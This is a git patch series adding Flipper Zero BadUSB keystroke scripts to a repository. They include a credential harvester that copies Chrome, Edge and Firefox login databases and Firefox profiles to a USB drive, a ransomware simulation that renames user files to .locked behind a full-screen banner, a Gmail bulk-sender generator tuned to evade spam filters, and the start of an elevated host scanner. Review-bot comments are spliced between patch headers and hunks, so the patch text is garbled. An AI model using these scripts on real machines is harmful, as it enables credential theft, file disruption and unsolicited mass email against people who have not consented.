From 79221d9efbef1734c4e00d7c70263274ef192c13 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:33:31 -0400
Subject: [PATCH 01/33] Delete BadUSB/CredentialHarvesterByMarkCyber
---
 BadUSB/CredentialHarvesterByMarkCyber | 62 --------------------------
 1 file changed, 62 deletions(-)
 delete mode 100644 BadUSB/CredentialHarvesterByMarkCyber
diff --git a/BadUSB/CredentialHarvesterByMarkCyber b/BadUSB/CredentialHarvesterByMarkCyber
deleted file mode 100644
index b66d4625..00000000
--- a/BadUSB/CredentialHarvesterByMarkCyber
+++ /dev/null
@@ -1,62 +0,0 @@
-REM This script was created by github.com/MarkCyber
-REM Harvests all credentials from chrome, edge, and firefox
-REM This script requires a secondary USB named "MYUSB" to save credentials to
-REM The extracted data will require decryption
-
-REM Set delay for Flipper Zero
-DELAY 1000
-
-REM Open PowerShell with elevated privileges
-GUI r
-DELAY 500
-STRING powershell
-DELAY 500
-ENTER
-DELAY 1000
-
-REM Check if the USB drive exists
-STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
-STRING if ($usbDrive -ne $null) {
-ENTER
-DELAY 500
-STRING cd $usbDrive;
-ENTER
-DELAY 500
-STRING mkdir BrowserData;
-ENTER
-DELAY 500
-STRING cd BrowserData;
-ENTER
-DELAY 500
-
-REM Copy Chrome Login Data to USB
-STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
-STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
-ENTER
-DELAY 500
-
-REM Copy Firefox Login Data to USB
-STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
-STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
-ENTER
-DELAY 500
-
-REM Copy Edge Login Data to USB
-STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
-STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
-ENTER
-DELAY 500
-STRING }
-ENTER
-DELAY 500
-
-REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on targetPC)
-STRING echo off | clip
-ENTER
-DELAY 500
-
-REM Close PowerShell
-STRING exit
-ENTER
-DELAY 500
-REM Check out my other badusb scripts on github.com/MarkCyber
From f86809a4ab3ec46478120218b97b47c8141608d8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:35:26 -0400
Subject: [PATCH 02/33] Create CredentialHarvester
---
 BadUSB/MarkCyber-BadUSB/CredentialHarvester | 53 +++++++++++++++++++++
 1 file changed, 53 insertions(+)
 create mode 100644 BadUSB/MarkCyber-BadUSB/CredentialHarvester
diff --git a/BadUSB/MarkCyber-BadUSB/CredentialHarvester b/BadUSB/MarkCyber-BadUSB/CredentialHarvester
new file mode 100644
index 00000000..e0d83e27
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/CredentialHarvester
@@ -0,0 +1,53 @@
+REM ##################################################################################################################
+REM ############## This script was created by github.com/markcyber ##############
+REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
+REM ############## The extracted data will require decryption ##############
+REM ##################################################################################################################
+REM Open PowerShell
+DELAY 1000
+GUI r
+DELAY 500
+STRING powershell
+DELAY 500
+ENTER
+DELAY 1000
+REM Check if the USB drive exists
+STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
+STRING if ($usbDrive -ne $null) {
+ENTER
+DELAY 500
+STRING cd $usbDrive;
+ENTER
+DELAY 500
+STRING mkdir BrowserData;
+ENTER
+DELAY 500
+STRING cd BrowserData;
+ENTER
+DELAY 500
+REM Copy Chrome Login Data to USB
+STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
+STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
+ENTER
+DELAY 500
+REM Copy Firefox Login Data to USB
+STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
+STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
+ENTER
+DELAY 500
+REM Copy Edge Login Data to USB
+STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
+STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
+ENTER
+DELAY 500
+STRING }
+ENTER
+DELAY 500
+REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
+STRING echo off | clip
+ENTER
+DELAY 500
+REM Close PowerShell
+STRING exit
+ENTER
+DELAY 500
From 651204becb6bb6854bd85fa49cac94548b27be90 Mon Sep 17 00:00:00 2001
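Review bot: The comment `REM Clear the clipboard to remove any sensitive data` does not describe what `STRING echo off | clip` does — it places the literal text `off` on the clipboard rather than emptying it — so the comment should read `REM Overwrite the clipboard with a harmless value` or the step should go. The `if ($usbDrive -ne $null) {` block has no `else`, so when the MYUSB volume is absent or mislabelled the typed `}` closes an empty block and PowerShell exits with no message, leaving the operator with no indication the run did nothing. Everything copied is written in its original form to an unencrypted removable volume, and nothing on the host records what was taken; for an assessment run under authorization the header should state that the output drive is to be encrypted and the run logged, since this copy-to-removable-media pattern is precisely what device-control and DLP policies are configured to alert on. The Firefox branch also copies the entire `Profiles\` tree with `-Recurse`, far more than the credential store the header describes, which the `REM` above it should say.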
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:36:41 -0400
Subject: [PATCH 03/33] Create RansomwareSimMain.txt
---
 .../RansomwareSimMain.txt | 91 +++++++++++++++++++
 1 file changed, 91 insertions(+)
 create mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
new file mode 100644
index 00000000..aef51165
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimMain.txt
@@ -0,0 +1,91 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 1000
+REM opens powershell (this is for windows machines)
+STRING powershell
+ENTER
+DELAY 3000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 500
+ENTER
+DELAY 500
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 500
+ENTER
+DELAY 500
+STRING )
+DELAY 500
+ENTER
+DELAY 500
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 500
+ENTER
+DELAY 500
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 500
+ENTER
+DELAY 500
+REM Get all files in the path and rename them
+STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
+DELAY 500
+ENTER
+DELAY 500
+STRING }
+DELAY 500
+ENTER
+DELAY 2000
+REM Display ransomware message
+STRING Add-Type -AssemblyName PresentationFramework
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window = New-Object System.Windows.Window
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowStartupLocation = 'CenterScreen'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.WindowState = 'Maximized'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Topmost = $true
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
+DELAY 500
+ENTER
+DELAY 500
+STRING $Window.ShowDialog()
+DELAY 500
+ENTER
+DELAY 2000
+STRING exit
+DELAY 500
+ENTER
+REM check out my github at github.com/markcyber for more badusb tools
From 1277874a0176fb3bdf1aeaac7a70bf2122dc60c1 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:37:31 -0400
Subject: [PATCH 04/33] Create RansomwareSimCleanup.txt
---
 .../RansomwareSimCleanup.txt | 61 +++++++++++++++++++
 1 file changed, 61 insertions(+)
 create mode 100644 BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
diff --git a/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
new file mode 100644
index 00000000..01776dbe
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/RansomwareSimulation/RansomwareSimCleanup.txt
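Review bot: `[System.Environment+SpecialFolder]::Downloads` in the fourth `STRING` of the `$folders` array is not a member of the SpecialFolder enumeration (it has Desktop, MyPictures and MyMusic, but no Downloads value), so that element is not a usable folder: depending on how PowerShell coerces the value `GetFolderPath` receives, the pass either errors there or repeats a folder it already processed, in which case Desktop files pick up a second `.locked` suffix that the cleanup script strips only one of per run. Drop that element, or resolve the Downloads folder by path rather than by enum, and fix the same entry in RansomwareSimCleanup.txt. For a simulation that renames real user files, no record of what was renamed is written anywhere, so recovery depends entirely on the cleanup script's suffix match; a `REM` stating that dependency, plus an `Export-Csv` of `$_.FullName` before each `Rename-Item`, would keep the exercise recoverable even if cleanup is run against a different folder list. `Rename-Item` also carries no `-ErrorAction`, so a collision with an existing `name.locked` leaves that file untouched with only a console error the banner window then hides.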
@@ -0,0 +1,61 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% **This can be ran multiple times if necessary** %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 2000
+STRING powershell
+ENTER
+REM increased delays to make sure each command can go through even on slower computers
+DELAY 6000
+REM Define the locations using correct SpecialFolder enumerations
+STRING $folders = @(
+DELAY 1000
+ENTER
+DELAY 1000
+STRING [System.Environment+SpecialFolder]::Desktop,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::MyPictures,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::MyMusic,
+DELAY 1000
+ENTER
+DELAY 2000
+STRING [System.Environment+SpecialFolder]::Downloads
+DELAY 1000
+ENTER
+DELAY 2000
+STRING )
+DELAY 1000
+ENTER
+DELAY 3000
+REM Iterate over each location
+STRING foreach ($folder in $folders) {
+DELAY 1000
+ENTER
+DELAY 1000
+STRING $path = [Environment]::GetFolderPath($folder)
+DELAY 1000
+ENTER
+DELAY 4000
+REM Get all .locked files in the path and rename them back
+STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
+DELAY 2000
+ENTER
+DELAY 5000
+STRING }
+DELAY 1000
+ENTER
+DELAY 4000
+STRING exit
+DELAY 1000
+ENTER
From f7d4bf9bc5789556cbd432709bd4e201e3364ce8 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:37:50 -0400
Subject: [PATCH 05/33] Rename CredentialHarvester to CredentialHarvester.txt
---
 .../{CredentialHarvester => CredentialHarvester.txt} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename BadUSB/MarkCyber-BadUSB/{CredentialHarvester => CredentialHarvester.txt} (100%)
diff --git a/BadUSB/MarkCyber-BadUSB/CredentialHarvester b/BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt
similarity index 100%
rename from BadUSB/MarkCyber-BadUSB/CredentialHarvester
rename to BadUSB/MarkCyber-BadUSB/CredentialHarvester.txt
From bcc7e9fa9a52decf5ec67620a6a10d5d28274397 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:38:58 -0400
Subject: [PATCH 06/33] Create EmailSender
---
 BadUSB/MarkCyber-BadUSB/Emails/EmailSender | 42 ++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 BadUSB/MarkCyber-BadUSB/Emails/EmailSender
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender
new file mode 100644
index 00000000..a3eadd1c
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender
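Review bot: The `$folders` array is a second copy of the list in RansomwareSimMain.txt, including the same `[System.Environment+SpecialFolder]::Downloads` entry, which is not a member of that enumeration; any folder on which the two lists disagree stays locked after cleanup, and the header should carry a `REM` saying this list must mirror the main script's exactly. The filter `Where-Object { $_.Name.EndsWith('.locked') }` is a case-sensitive .NET comparison while NTFS names are not, so a file renamed by hand to `.LOCKED` is skipped even though the `-replace` that follows is case-insensitive; `Where-Object { $_.Name -like '*.locked' }` matches the way the filesystem does. The header line `Running this renames all extensions back to their original, full path- making them usable` is unclear; `renames each *.locked file back to its original name` says what the `-replace '\.locked$', ''` actually does.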
@@ -0,0 +1,42 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
+REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
+REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
+REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+GUI r
+DELAY 500
+STRING chrome
+ENTER
+DELAY 1000
+STRING https://mail.google.com/mail/u/0/#inbox?compose=new
+ENTER
+DELAY 5000
+DELAY 1000
+STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
+DELAY 500
+TAB
+TAB
+STRING {YOUR SUBJECT NAME}
+TAB
+STRING Hi {THEIR NAME}
+ENTER
+ENTER
+STRING {CONTENTS OF THE EMAIL}
+ENTER
+ENTER
+STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
+ENTER
+ENTER
+STRING Respectfully,
+ENTER
+ENTER
+STRING {YOUR NAME}
+ENTER
+CTRL ENTER
+DELAY 5000
+DELAY 1000
+ALT F4
+REM Check out github.com/MarkCyber for more scripts
From 05712f5b8c3559bcfca83010ad63ae28e16bea7a Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:39:12 -0400
Subject: [PATCH 07/33] Rename EmailSender to EmailSender.txt
---
 BadUSB/MarkCyber-BadUSB/Emails/{EmailSender => EmailSender.txt} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename BadUSB/MarkCyber-BadUSB/Emails/{EmailSender => EmailSender.txt} (100%)
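Review bot: Nothing after `DELAY 5000` confirms that the Gmail compose view has focus, so on a slow page load or a Chrome profile picker every following `STRING` line — recipient, subject and body — is typed into whatever window is in front, and `CTRL ENTER` then acts on that window instead. A keystroke script cannot check state, so the header should say that the 5000 ms is a tuning value that must be verified on the machine it runs on, and the adjacent `DELAY 5000` / `DELAY 1000` pair reads more clearly as a single `DELAY 6000`. The `{...}` placeholders are typed literally if left unreplaced, so a `REM` at the top listing the seven fields to edit would stop a half-edited script from sending. The sibling generator in GenerateEmailSendBadUSB.py emits `CONTROL ENTER` where this file uses `CTRL ENTER`; both parse, but one spelling keeps the two in step.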
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/EmailSender b/BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
similarity index 100%
rename from BadUSB/MarkCyber-BadUSB/Emails/EmailSender
rename to BadUSB/MarkCyber-BadUSB/Emails/EmailSender.txt
From 5d2d96543ece9806250af055e0483afd7b7d1b54 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:40:24 -0400
Subject: [PATCH 08/33] Create GenerateEmailSendBadUSB.py
---
 .../Emails/GenerateEmailSendBadUSB.py | 101 ++++++++++++++++++
 1 file changed, 101 insertions(+)
 create mode 100644 BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py
new file mode 100644
index 00000000..16662391
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py
@@ -0,0 +1,101 @@
+#######################################################################################################################################
+#######################################################################################################################################
+################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
+################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
+################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
+################# This script will then make a badusb script using the name + email of each person ####################
+################# There are various subject options that will be chosen from, to minimize "spam" ####################
+################# Change the signature to your name, and put subject options that fit your email ####################
+################# Lastly, of course make sure to change the contents of the email to what you want ####################
+#######################################################################################################################################
+#######################################################################################################################################
+
+import pandas as pd
+import random
+
+# Load the Excel file, make sure it has the same name (or change the name in this script)
+file_path = 'NameAndEmails.xlsx'
+data_df = pd.read_excel(file_path)
+
+# Your excel should have 2 columns. Names, and Emails.
+data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
+data_cleaned_df.columns = ['Name', 'Email']
+
+# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
+subject_options = [
+ "Placeholder for subject option 1",
+ "Placeholder for subject option 2",
+ "Placeholder for subject option 3",
+ "Placeholder for subject option 4",
+ "Placeholder for subject option 5",
+ "Placeholder for subject option 6",
+ "Placeholder for subject option 7"
+]
+
+# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
+# Just modify the actual email body and sender name to fit your needs
+email_body_template = """
+Hi {name},
+
+Placeholder for email body.
+
+Warm Regards,
+Sender Name
+"""
+
+# Function to generate BadUSB script
+def generate_badusb_script_with_placeholders_single_file(data_df):
+ script_template = [
+ "DELAY 1000",
+ "GUI r",
+ "DELAY 500",
+ "STRING chrome",
+ "ENTER",
+ "DELAY 1000",
+ "STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
+ "ENTER",
+ "DELAY 5000"
+ ]
+
+ scripts = script_template
+
+ for index, row in data_df.iterrows():
+ name = row['Name']
+ email = row['Email']
+ subject = random.choice(subject_options)
+ random_delay = random.randint(10000, 25000)
+
+ email_body_lines = email_body_template.format(name=name).strip().split('\n')
+ email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
+
+ email_script = [
+ "DELAY 1000",
+ f"STRING {email}",
+ "DELAY 500",
+ "TAB",
+ "TAB",
+ f"STRING {subject}",
+ "TAB"
+ ] + email_body_lines + [
+ "ENTER",
+ "CONTROL ENTER",
+ "DELAY 5000",
+ f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
+ "ALT F4"
+ ]
+
+ scripts += email_script
+
+ return "\n".join(scripts)
+
+# Generate the BadUSB script with placeholders and proper send command in a single file
+final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
+
+# Save the script to a file
+final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
+with open(final_script_file_path, 'w') as file:
+ file.write(final_script_with_placeholders)
+
+print(f"Script saved to {final_script_file_path}")
+
+#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts
From 7df0a8863f6141ce10b8547df052a71f8a1e4007 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:40:40 -0400
Subject: [PATCH 09/33] Rename GenerateEmailSendBadUSB.py to GenerateEmailSend.py
---
 .../Emails/{GenerateEmailSendBadUSB.py => GenerateEmailSend.py} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename BadUSB/MarkCyber-BadUSB/Emails/{GenerateEmailSendBadUSB.py => GenerateEmailSend.py} (100%)
diff --git a/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py b/BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
similarity index 100%
rename from BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSendBadUSB.py
rename to BadUSB/MarkCyber-BadUSB/Emails/GenerateEmailSend.py
From fb762b2fe3de0d2c2d384d6e7e3bbb1568ac5841 Mon Sep 17 00:00:00 2001
From: Mark <148797232+MarkCyber@users.noreply.github.com>
Date: Tue, 21 May 2024 14:42:14 -0400
Subject: [PATCH 10/33] Create VulnerabilityScanner.txt
---
 .../MarkCyber-BadUSB/VulnerabilityScanner.txt | 630 ++++++++++++++++++
 1 file changed, 630 insertions(+)
 create mode 100644 BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt
diff --git a/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt b/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt
new file mode 100644
index 00000000..51e1b0d0
--- /dev/null
+++ b/BadUSB/MarkCyber-BadUSB/VulnerabilityScanner.txt
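Review bot: Spreadsheet cells are interpolated straight into keystroke lines (`f"STRING {email}"`, and `name` through `email_body_template.format`) with no check that they are single-line strings, so a `Names` or `Emails` cell containing a newline, or a non-string value pandas read from the sheet, turns into extra lines in the generated script that the device will execute as commands. Coerce and validate before use — `name = str(row['Name']).strip()`, likewise for `email`, and raise `ValueError` when `'\n' in name or '\n' in email` — since a spreadsheet is untrusted input for this purpose. `scripts = script_template` aliases the list, so `scripts += email_script` mutates `script_template` on every call; `scripts = list(script_template)` is what was meant. Separately, the Chrome/compose lines are emitted once before the loop while each iteration ends with `"ALT F4"`, so from the second row on the address is typed with no compose window open; either the open sequence belongs inside the loop or the close belongs after it.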
@@ -0,0 +1,630 @@
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+DELAY 1000
+REM Open Start Menu
+CONTROL ESCAPE
+DELAY 2000
+STRING powershell
+REM Navigate to the context menu to run PowerShell as an administrator
+DELAY 500
+RIGHTARROW
+DELAY 100
+DOWNARROW
+DELAY 100
+ENTER
+DELAY 3000
+ALT Y
+DELAY 5000
+REM Set PowerShell Execution Policy to Bypass
+DELAY 1000
+STRING set-executionpolicy bypass -scope process -force
+DELAY 200
+ENTER
+DELAY 200
+REM Create the PowerShell script in memory and execute it
+DELAY 200
+STRING $usbName = "MYUSB"
+DELAY 200
+ENTER
+DELAY 200
+STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
+DELAY 200
+ENTER
+DELAY 200
+STRING if ($usbDrive) {
+DELAY 200
+ENTER
+DELAY 200
+STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
+DELAY 200
+ENTER
+DELAY 200
+STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
+DELAY 200
+ENTER
+DELAY 200
+STRING New-Item -ItemType Directory -Path $directoryPath
+DELAY 200
+ENTER
+DELAY 200
+STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
+DELAY 200
+ENTER
+DELAY 200
+STRING "" > $resultsFilePath
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-passwordpolicy {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING net accounts
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error checking password policy: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function audit-services {
+DELAY 200
+ENTER
+DELAY 200
+STRING try {
+DELAY 200
+ENTER
+DELAY 200
+STRING get-service | select-object name, displayname, status, starttype
+DELAY 200
+ENTER
+DELAY 200
+STRING } catch {
+DELAY 200
+ENTER
+DELAY 200
+STRING write-output "Error auditing services: $_"
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING }
+DELAY 200
+ENTER
+DELAY 200
+STRING function check-networksettings {
+DELAY 200
+ENTER
+DELAY 200
